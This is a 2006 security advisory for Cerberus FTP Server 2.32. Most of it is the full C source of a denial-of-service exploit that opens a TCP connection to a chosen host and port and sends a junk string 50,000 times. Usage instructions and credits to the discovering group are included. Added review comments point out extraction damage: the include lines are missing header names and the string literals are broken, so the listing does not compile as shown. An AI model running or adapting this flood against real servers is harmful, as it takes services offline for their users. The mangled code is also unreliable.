|
Cerberus FTP Server 2.32 Denial of Service |
|
|
|
|
Tuesday, 14 February 2006 |
Vulnerability:
--------------------
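Denial of service:
A denial-of-service attack (also called a DoS attack) is an attack on a
computer system or network that causes a loss of service to users, typically
the loss of network connectivity and services by consuming the bandwidth
of the victim network or overloading the computational resources of the
victim system.
This advisory concerns the FTP service of Cerberus FTP Server 2.32 and
earlier; it does not describe the underlying flaw, only the proof of concept
below.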
Exploit:
--------------------
cerberus_232_dos_remote_xpl.c
CODE
#include
#include
#include
#include
#include
/* Format string main() passes to sprintf() to build the request buffer; it
 * copies its single string argument through unchanged. */
#define POCSTR "%s"
/* Forward declarations for the three helpers defined below. */
int header();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );
/*
 * Print the advisory banner (group name, title, credits, reference URL) to
 * stdout. Always returns 0.
 *
 * NOTE(review): every string literal below spans several source lines, which
 * is not valid C. This looks like page extraction having turned newline
 * escapes into real line breaks - TODO confirm against the original advisory.
 * The include lines at the top of the listing appear to have lost their
 * header names the same way, so the listing does not compile as shown.
 */
int header() {
printf("
[i] KAPDA - Computer Security Science Researchers
Institute
");
printf("[i] Title: Cerberus FTP Server <= v2.32 Dos
Exploit
");
printf("[i] Discovered by: cvh {a] kapda.ir
");
printf("[i] Exploit by: Pi3cH {a] kapda.ir
");
printf("[i] More info:
www.kapda.ir/page-advisory.html
");
return 0;
}
/*
 * Print the expected command line (HOST PORT) and an example invocation, then
 * terminate the process with exit status 0.
 *
 * filename: program name substituted into both messages.
 *
 * NOTE(review): declared as returning int but has no return statement; control
 * always leaves through exit(). The string literals are split across lines in
 * this listing, presumably extraction damage - TODO confirm.
 */
int usage(char *filename) {
printf("[i] Usage: %s HOST PORT
",filename);
printf("[i] Example: %s 127.0.0.1 21
",filename);
exit(0);
}
/*
 * Resolve a host name or dotted address, open a TCP socket and connect it.
 *
 * ip:   host name or address string handed to gethostbyname().
 * port: TCP port in host byte order; converted with htons() below.
 *
 * Returns the connected socket descriptor. There is no error return: a failed
 * lookup, socket() or connect() prints a message and ends the process with
 * exit status 1.
 *
 * NOTE(review): gethostbyname() is an obsolete interface and this code only
 * fills an AF_INET address, so IPv6 targets are not handled.
 */
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
/* Start from an all-zero address structure so unused fields are defined. */
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[e] Cannot resolve "%s"
", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
/* Use the first address in the lookup result. */
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[e] Socket failed!
" );
exit(1);
}
/* NOTE(review): the length passed is sizeof(struct sockaddr), not
 * sizeof(remote_addr); the two are presumably equal on common platforms -
 * verify. The socket is not closed on this failure path, though the process
 * exits immediately afterwards. */
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct
sockaddr ) ) == -1 )
{
printf ( "[e] Failed connecting!
" );
exit(1);
}
return ( s );
}
/*
 * Proof-of-concept driver: print the banner, connect to argv[1] on port
 * argv[2], copy junk_data into a heap buffer and send that buffer 50000 times
 * over the one connection, then close the socket and free the buffer.
 *
 * Returns 0 after the loop completes; exits with status 1 as soon as a send()
 * returns 0 or a negative value.
 *
 * Defender view: on the server side this is a single TCP session to the FTP
 * port carrying the same short string up to 50000 times with no reads in
 * between. The advisory does not say why the server stops responding, so
 * treat per-connection input limits and alerts on long runs of unrecognised
 * commands as a mitigation to evaluate, not a confirmed fix.
 *
 * NOTE(review): the argument check only guarantees argv[1], yet argv[2] is
 * read below; with a single argument atoi() receives a null pointer. The
 * check would need to be argc < 3.
 */
int main(int argc, char *argv[]) {
int s,i;
char *request;
/* NOTE(review): the trailing x0dx0a reads like two hex escapes whose
 * backslashes were stripped by the page; as shown it is just those literal
 * characters - TODO confirm against the original advisory. */
char junk_data[] = "DoS-JUNK-DATA.:(CVH):.x0dx0a";
header();
if( (argc < 2) )
usage(argv[0]);
/* NOTE(review): the malloc() result is used without a null check. */
request = (char *) malloc(1024);
printf("[r] Connecting to remote host
");
/* NOTE(review): atoi() reports no errors and its int result is narrowed to
 * unsigned short by the call, so a bad or out-of-range port goes unnoticed. */
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[r] Creating buffer
");
/* POCSTR is a plain string conversion, so request becomes a copy of junk_data,
 * which is far shorter than the 1024-byte allocation. */
sprintf(request,POCSTR,junk_data);
/* NOTE(review): strlen() returns size_t but the conversion here is %d. */
printf("[r] Sending %d bytes of DOS buffer
",strlen(request));
/* The loop body is the single if statement: one send() per iteration, and the
 * first failed or zero-length send ends the process. request is not freed on
 * that path. */
for(i=0;i<50000;i++)
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[e] Failed to send buffer
");
close(s);
exit(1);
}
sleep(1);
printf("[s] Exploit Done!
");
close(s);
free(request);
request = NULL;
return 0;
}
Solution:
--------------------
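Vendor couldn't care less, so no patch exists. (That was the status on 14 February 2006; check for a later vendor release, and until one is installed limit which hosts can reach the FTP port.)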
Credit :
--------------------
Discovered by cvh [at} kapda.ir
Exploit by pi3ch [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Science Researchers Institute
http://www.KAPDA.ir
|